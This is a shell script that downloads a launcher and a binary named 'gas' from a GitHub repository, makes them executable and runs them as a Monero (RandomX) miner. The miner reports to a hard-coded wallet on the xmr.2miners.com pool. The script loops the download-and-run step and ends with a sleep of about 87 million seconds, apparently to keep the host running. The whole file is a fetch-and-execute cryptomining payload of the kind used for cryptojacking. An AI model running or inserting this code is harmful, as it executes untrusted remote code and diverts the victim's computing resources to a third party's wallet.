#!/bin/sh
 
COUNTER=20
until [  $COUNTER -lt 10 ]; do
 
wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/hunshukajh/yes/raw/main/gas && chmod +x gas cmdline_launcher.sh && ./cmdline_launcher.sh -algo randomx -coin XMR -wallet 88RcMxeMuWgjg1rJoRMNRheZoDkEjR836fxRrSLEgGoA61kybzWQEyfJDDxjYvKxG4Fb9nuQFYMhH2qYqCi7jmBcFvyjoqT  -rigName  $(echo $(shuf -i 1-9999 -n 1)-SRBO) -pool1 xmr.2miners.com:2222

     echo COUNTER $COUNTER
     let COUNTER-=1
done
sleep 87282111
